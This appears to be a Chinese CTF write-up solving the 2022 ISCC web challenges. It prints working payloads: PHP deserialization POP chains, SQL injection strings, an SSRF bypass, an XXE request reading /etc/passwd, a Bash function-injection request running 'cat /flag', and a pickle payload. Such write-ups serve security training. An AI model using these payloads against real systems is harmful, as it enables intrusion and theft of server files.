2022ISCC-web-wp

2022ISCC-web-wp

2022ISCC-web

除了0解的爱国敬业好青年1,其他都写出来了,wp写的有点简单,有问题欢迎提问

冬奥会

传入一个json字符串,第一个键为year,且值不为数字

if(is_array(@$info["items"])){
    if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
    $status = array_search("skiing", $info["items"]);
    $status===false?die("Sorry~"):NULL;
    foreach($info["items"] as $key=>$val){
      $val==="skiing"?die("Sorry~"):NULL;
    }
    $Step2=True;
  }

第二个键为items,利用函数接入到了不符合的类型返回“0”,使用二维数组进行绕过

poc

?Information={"year":"a","items":[0,[],"a"]}

爱国敬业好青年2

5.10为共青团成立100周年,猜测坐标为天安门,进入/flag页面,post提交经纬度即可得到flag

post提交

lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N

image-20220517155854977

Pop2022

目标为include。可以使用php伪协议来读取并输出文件。

poc:

<?php
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        //echo 'Road_is_Long__construct';
        $this->page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;
    }
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=/flag.php';
    public function append($value){
        echo 'append';
        include($value);
    }
    public function __invoke(){
        echo '__invoke';
        $this->append($this->var);
    }
} 
class Make_a_Change{
    public $effort;
    public function __construct(){
        //echo 'Make_a_Change__construct';
        $this->effort = array();
    }
    public function __get($key){
        echo '__get';
        $function = $this->effort;
        return $function();
    }
}
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard(); 
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a)); 
?>

image-20220517161901092

ISCC{lets_pop_your_2022}

Easy-SQL

?id=-8 union table emails limit 7,1#

获得源码

在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据

username=0’ union select 1,0x61646d696e,3#&passwd=3

findme

简单的php原生类利用

http://59.110.159.206:8030/unser.php

先使用伪协议获取hint.php,得知flag大概位置

<?php
class a{
    public $un0;
    public $un1;
    public $un2="php://filter/convert.base64-encode/resource=";
    public $un3;
    public $un4;
}
$payload=new a();
echo serialize($payload);

poc直接打获得flag文件

<?php
class a{
    public $un0="DirectoryIterator";
    public $un1="glob:///var/www/html/f*.txt";
    public $un2;
    public $un3="unserialize";
    public $un4="abc";
}
$a=new a();
echo serialize($a);

让我康康!

一个搜索框,提示我们访问fl4g页面,访问后返回403页面,我们尝试一下使用HTTP请求走私漏洞访问fl4g页面,提示需要来自本地

image-20220503130639521

配合搜索框,发现由前端重写的请求包会被反馈在响应中,需要post提交数据,添加CT字段,成功通过HTTP请求走私漏洞获取到了前端服务器用来指定来源IP的字段名,我们就可以伪造成本地用户了

image-20220503125302695

最终获得flag

image-20220502205532017

这是一道代码审计题

访问index构造请求url=1,获得报错页面,查看源码

image-20220518123746101

访问此文件,发现emoji编码的源码,

image-20220518123818415

进行解码,获得源代码

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"
def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"
def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False
def judge_ip(ip):
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False

构造请求http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x

绕过ssrf限制,获得新提示

image-20220518124929424

访问此目录,并抓包更改cookie为题目所给

image-20220518125148120

登录到登录框界面,右键查看源代码,得到一串js源码

image-20220518125232696

很明显要我们构造post数据包,存在xxe漏洞,构造如下

POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY name SYSTEM "file:///etc/passwd">
  ]>
<user><name>&name;</name><password>admin</password></user>

成功读取文件

image-20220518125339178

根据提示利用proc特性,proc/self/cwd/获取目标当前进程环境的运行目录与目录里的文件

读取proc/self/cwd/flag.txt文件得到flag

image-20220518125601528

ping2rce

环境变量rce,可参考p牛的文章https://tttang.com/archive/1450/,直接构造poc即可命令执行

image-20220522115344461

POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379
--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"
() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--

image-20220522122437887

Melody

先随便登录一个用户,可以看到存在session认证

image-20220502100826258

eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI

发现提示/info页面需要使用Melody浏览器登录,更改UA头为Melody即可

发现junjia2模板注入,查看配置信息,发现session_key,那我们接下来直接伪造session即可

image-20220501192825793

获得key:meldoy-is-so-cute-wawawa!

image-20220502111839984

然后使用脚本进行flask session伪造,替换session后登录成功

image-20220502111258191

虚假的flag,发现一个py源文件,访问下载

image-20220502111617508

代码如下

# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request
class register:
    def __init__(self,name,password):
        self.name = name
        self.password = password
    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module[0:8] == '__main__':
            return getattr(sys.modules['__main__'],name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/therealflag', methods=['GET','POST'])
def realflag():
    if request.method == 'POST':
        try:
            data = request.form.get('melody')
            if b'R' in base64.b64decode(data):
                return 'no reduce'
            else:
                result = find(base64.b64decode(data))
                if type(result) is not register:
                    return 'The type is not correct!'
            correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
            if correct:
                if session['username'] == 'admin':
                    return Response(read('./flag.txt'))
                else:
                    return Response("You're not admin!")
        except Exception as e:
            return Response(str(e))
    test = register('admin', '123456')
    data = base64.b64encode(pickle.dumps(test)).decode()
    return Response(data)

pickle反序列化,写脚本,pker进行原变量覆盖

import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))

image-20220502112718704

                       

点击阅读全文

上一篇 2023年 5月 28日 am10:49
下一篇 2023年 5月 28日 am10:50